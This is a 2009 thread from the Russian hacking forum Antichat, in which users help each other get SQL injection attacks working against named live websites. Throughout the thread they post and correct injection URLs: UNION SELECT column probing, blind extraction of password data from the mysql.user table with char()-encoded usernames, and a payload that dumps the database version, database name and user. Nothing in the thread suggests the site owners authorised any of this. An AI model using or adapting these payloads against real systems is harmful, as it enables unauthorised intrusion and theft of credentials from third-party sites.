Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
30.01.2009, 18:53
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
spasibo
|
|
|
30.01.2009, 19:34
|
|
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123
Репутация:
122
|
|
sabe
Код:
http://photo.gala.net/index.php?action=view&id=-120141026+union+select+222+--+
1 колонка
не пойму, ну выводит 222,а как узнать версию? |
|
|
|
30.01.2009, 19:50
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Это не вывод...
Код:
http://photo.gala.net/index.php?action=view&id=120141026+union+select+111111111111111--
Похоже, там 11 колонок, но вывода нету.
Насчёт подзапросов...
Всего пару раз встречался с Sybase ASE, поэтому не знаю, работают они там или нет..
Вроде нет.
Хотя.. сейчас может придёт дядя jokester и отругает меня за то, что я снова тороплюсь ^^
Последний раз редактировалось R1dex; 30.01.2009 в 19:53..
|
|
|
|
30.01.2009, 20:03
|
|
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889
Репутация:
60
|
|
Здравствуйте)
Помогите найти ошибку,пожалуйста! 
PHP код:
http://www.tehbasa.ru/index.php?idt=25
+and+ascii(lower(substring(select+password
+from+mysql.user+where
+user=char(116,101,104,98,97,115,97,95,97,
115,105,100,64,55,57,46,49,55,52,46,55,51,46,55,50)+limit+1),1,1)))%3C=122
|
|
|
|
30.01.2009, 20:08
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
http://www.tehbasa.ru/index.php?idt=25+and+ascii(lower(substring(select+ password+from+mysql.user+where+user=char(116,101,1 04,98,97,115,97,95,97,115,105,100,64,55,57,46,49,5 5,52,46,55,51,46,55,50)+limit+1,1),1,1)))%3C=122
либо
http://www.tehbasa.ru/index.php?idt=25+and+ascii(lower(substring(select+ password+from+mysql.user+where+user=char(116,101,1 04,98,97,115,97,95,97,115,105,100,64,55,57,46,49,5 5,52,46,55,51,46,55,50)+limit+1,1)))%3C=122
|
|
|
|
30.01.2009, 20:09
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
даже не глядя - +limit+1 = бред. Как минимум limit+0,1
и что такое "%3C="???
просто "=" уже не модно?
|
|
|
|
30.01.2009, 20:15
|
|
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889
Репутация:
60
|
|
%3C=
Это <=
Причем тут модно не модно!я проверяю существует ли вообще |
|
|
|
30.01.2009, 20:20
|
|
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889
Репутация:
60
|
|
http://www.tehbasa.ru/index.php?idt=25+and+ascii(lower(substring(select+ password+from+mysql.user+where+user=char(116,101,1 04,98,97,115,97,95,97,115,105,100,64,55,57,46,49,5 5,52,46,55,51,46,55,50)+limit+1,1)))%3C=122
если ты убераешь 1,1 с чем тогда сравнивать?
|
|
|
|
30.01.2009, 20:23
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Перед select нехватает одной скобки..
А вообще, там нету mysql.user )
Последний раз редактировалось R1dex; 30.01.2009 в 20:32..
|
|
|
|
30.01.2009, 20:33
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458
Репутация:
3965
|
|
А не проще
http://www.tehbasa.ru/index.php?idt=25+UNION+SELECT+CONCAT_WS(0x3a,Versi on(),Database(),User()),2,3,4,5,6,7/*
?
__________________
BlackHat. MoDL
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
